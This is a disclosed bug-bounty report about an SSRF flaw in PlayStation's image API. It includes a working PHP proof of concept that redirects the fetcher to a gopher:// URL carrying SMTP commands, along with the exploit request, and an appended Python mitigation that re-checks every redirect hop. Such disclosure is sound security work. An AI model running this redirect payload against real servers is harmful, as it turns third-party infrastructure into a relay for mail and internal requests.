
SSRF on image renderer

High
PlayStation
Submitted None

Team Summary

Official summary from PlayStation

## Summary:

image.api.np.km.playstation.net allows image urls to be passed via the `image` parameter

It is possible to use this endpoint to send Gopher requests that result in SMTP messages being sent

## Steps To Reproduce:

1. Create a Gopher redirect PHP file to save to your server

```
<?php
$commands = array(
    'HELO test.org',
    'MAIL FROM: <[email protected]>',
    'RCPT TO: <[email protected]>',
    'DATA',
    'Test mail',
    '.'
);
$payload = implode('%0A', $commands);
header('Location: gopher://test.smtp.org:25/_'.$payload);
?>
```

2. Point the URL to your file location via the `image` parameter

https://image.api.np.km.playstation.net/images/?format=png&image=http%3A%2F%2Fblackdoorsec.net/gopher3.php

It will return a 404 message, but you will see that your server is hit

{F737783} {F737781}

3. Check the log http://test.smtp.org/log

{F737782}

Confirms the ec2 instance sending the email

## Supporting Material/References:

```
GET /images/?format=png&image=http%3A%2F%2Fblackdoorsec.net/gopher3.php HTTP/1.1
Host: image.api.np.km.playstation.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

Related issue https://hackerone.com/reports/115748

## Impact

craft server requests using sony servers

Reported by hogarth45
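
A mitigation sketch for the redirect-to-Gopher behaviour in the report above, added here as an example and not taken from the report or from PlayStation's code: the fetcher follows redirects by hand and re-applies the scheme, port and address policy to every `Location`. The `http_get` hook, the host names and the address used in `demo()` are constructed assumptions.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_PORTS = {"http": 80, "https": 443}   # scheme -> the only port accepted
MAX_REDIRECTS = 3

class BlockedURL(ValueError):
    """Raised when any hop in the fetch chain violates the policy."""

def check_hop(url, resolve=socket.getaddrinfo):
    """Validate one URL of the chain; return it or raise BlockedURL."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_PORTS:            # rejects gopher://, file://, ...
        raise BlockedURL(f"scheme not allowed: {scheme!r}")
    if not parts.hostname:
        raise BlockedURL("missing host")
    port = parts.port or ALLOWED_PORTS[scheme]
    if port != ALLOWED_PORTS[scheme]:          # no :25 or other service ports
        raise BlockedURL(f"port not allowed: {port}")
    for info in resolve(parts.hostname, port):
        ip = ipaddress.ip_address(info[4][0])
        if not ip.is_global:                   # loopback, RFC 1918, link-local
            raise BlockedURL(f"non-public address: {ip}")
    return url

def fetch_image(url, http_get, resolve=socket.getaddrinfo):
    """Follow redirects by hand so every Location is re-validated.
    http_get(url) is a hypothetical hook that must not follow redirects
    itself; it returns (status, headers, body)."""
    for _ in range(MAX_REDIRECTS + 1):
        check_hop(url, resolve)
        status, headers, body = http_get(url)
        if status not in (301, 302, 303, 307, 308):
            return status, body
        url = urljoin(url, headers.get("Location", ""))
    raise BlockedURL("too many redirects")

def demo():
    """Constructed replay: an http:// image URL that 302s to gopher://."""
    hops = {"http://attacker.example/r.php":
            (302, {"Location": "gopher://smtp.example:25/_HELO%20x"}, b"")}
    resolve = lambda host, port: [(2, 1, 6, "", ("8.8.8.8", port))]  # constructed
    try:
        return fetch_image("http://attacker.example/r.php", hops.__getitem__, resolve)
    except BlockedURL as exc:
        return str(exc)
```

In a real fetcher, connect to the address that `check_hop` validated instead of resolving the name a second time, so the check and the request cannot see different DNS answers.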

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$1000.00

Submitted